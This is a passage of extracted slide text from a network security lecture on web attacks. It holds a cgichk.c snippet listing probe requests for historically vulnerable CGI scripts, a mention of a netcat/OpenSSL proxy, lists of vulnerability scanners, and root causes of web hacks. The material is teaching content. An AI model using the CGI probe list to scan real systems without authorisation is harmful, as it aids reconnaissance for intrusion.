• cgichk.c<snip>"GET /cgi-bin/phf HTTP/1.0\n\n";"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";"GET /cgi-bin/test-cgi HTTP/1.0\n\n";"GET /cgi-bin/php.cgi HTTP/1.0\n\n
• ISS, Cybercop, Retina, etc.
![Page 136: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/136.jpg)
el33t hax0r Training for el33t hax0r Training for Web Combat…Web Combat…
What about SSL?
• Some SSL Myths:– “We are secure because we use SSL!”– “Strong 128 bit crypto being used”– “We use Digital Certificates signed by
VeriSign”
![Page 137: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/137.jpg)
Proxy Over SSLProxy Over SSL• Using netcat and OpenSSL, it is possible
to create a simple two-line SSL Proxy!• Listen on port 80 on a host and redirect
requests to port 443 on a remote host through SSL.
SSLweb
server
Webclient
openssl
nc
![Page 138: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/138.jpg)
Assessment ToolsAssessment Tools
• Vulnerability scanners– Look for a known list of vulnerable
applications or technologies– Do not (can not) engage/scan custom
applications and configurations– General vulnerability scanners: ISS,
Cybercop, Nessus– Web-specific vulnerability scanners:
WebInspect, whisker
![Page 139: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/139.jpg)
Assessment toolsAssessment tools
• ‘Proxy monitors’– HTTP proxy which monitors traffic, looking
for web vulnerabilities as they pass– Can analyze custom applications with the
help of a user– Examples: AppScan, RFProxy,
HTTPush, Achilles
![Page 140: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/140.jpg)
Root Causes of Web Root Causes of Web HacksHacks
• Complex web architectures may cause oversight in web server configuration.
• URL Parsing.• File Canonicalization.• Combination of underlying operating
system and web server may leave holes.
![Page 141: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/141.jpg)
Root Causes of Web Root Causes of Web HacksHacks
• Untested code used in web applications, to save time.
• Level of security consciousness low in web application developers.
• Security vs. convenience.• Security vs. time-to-market.• Zero knowledge administration breeds
zero knowledge administrators.